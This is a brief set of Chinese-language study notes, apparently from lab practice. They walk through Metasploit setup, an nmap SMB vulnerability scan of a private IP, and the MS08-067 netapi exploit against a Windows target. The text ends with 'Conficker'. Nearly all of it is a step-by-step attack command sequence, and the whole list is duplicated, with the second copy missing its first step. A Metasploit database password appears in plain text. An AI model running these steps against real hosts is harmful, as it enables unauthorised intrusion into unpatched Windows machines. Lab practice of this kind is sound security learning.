1、service postgresql start 打开数据库服务
2、service metasploit start 启动metasploit服务
3、update-rc.d postgresql enable 更新服务
4、update-rc.d metasploit enable
5、update-rc.d ssh enable 更新自己端口服务
6、msfconsole
7、db_status 查看数据库
链接数据库 db_connect msf3:vfe90zuSG1wfufKYbAwXOtfaTBsMcJVc@127.0.0.1/msf3
查看密码vi /opt/metasploit/properties.ini
扫描端口db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.230.145
8、利用漏洞use exploit/windows/smb/ms08_067_netapi
9、show options需要什么配置
10、set RHOST 192.168.230.145设置对方IP
11、set target 41设置目标系统
12、exploit 攻击
笔记!!!!!
Conficker
2、service metasploit start 启动metasploit服务
3、update-rc.d postgresql enable 更新服务
4、update-rc.d metasploit enable
5、update-rc.d ssh enable 更新自己端口服务
6、msfconsole
7、db_status 查看数据库
链接数据库 db_connect msf3:vfe90zuSG1wfufKYbAwXOtfaTBsMcJVc@127.0.0.1/msf3
查看密码vi /opt/metasploit/properties.ini
扫描端口db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.230.145
8、利用漏洞use exploit/windows/smb/ms08_067_netapi
9、show options需要什么配置
10、set RHOST 192.168.230.145设置对方IP
11、set target 41设置目标系统
12、exploit 攻击
笔记!!!!!
Conficker